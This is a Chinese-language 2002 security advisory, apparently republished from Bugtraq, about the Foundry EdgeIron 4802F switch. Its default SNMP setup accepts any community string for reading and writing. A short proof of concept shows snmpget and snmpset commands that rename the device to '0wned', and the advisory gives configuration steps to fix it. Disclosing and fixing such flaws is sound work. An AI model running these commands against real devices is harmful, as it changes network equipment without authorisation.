Foundry Networks EdgeIron 4802F交换机SNMP默认配置存在漏洞发布时间:2002-03-22 更新时间:2002-03-22 严重程度:中 威胁程度:服务器信息泄露 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:4330 受影响系统 Foundry Networks EdgeIron 4802F Fast Ethernet switches详细描述 Foundry Networks EdgeIron 4802F是设计用来提供高性能,完全第2层的交换机系列。 Foundry Networks EdgeIron 4802F存在默认的SNMP配置可以允许使用任意通信串的SNMP请求来读和写用户 测试代码 [prophecy@loki ~]$ snmpget 10.1.1.120 public system.sysName system.sysName.0 = [prophecy@loki ~]$ [prophecy@loki ~]$ snmpset 10.1.1.120 totallyinvalidcommunitystring system.sysName s "0wned" system.sysName.0 = 0wned [prophecy@loki ~]$ 解决方案 使用如下方法限制指定IP和交换机通信: EdgeIron(config)# EdgeIron(config)#snmp-server security EdgeIron(config)# EdgeIron(config)#snmp-server user <name> <community-string> <ip-address> 相关信息 advisory@prophecy.net.nz 参考:http://archives.neohapsis.com/archives/bugtraq/2002-03/0244.html |
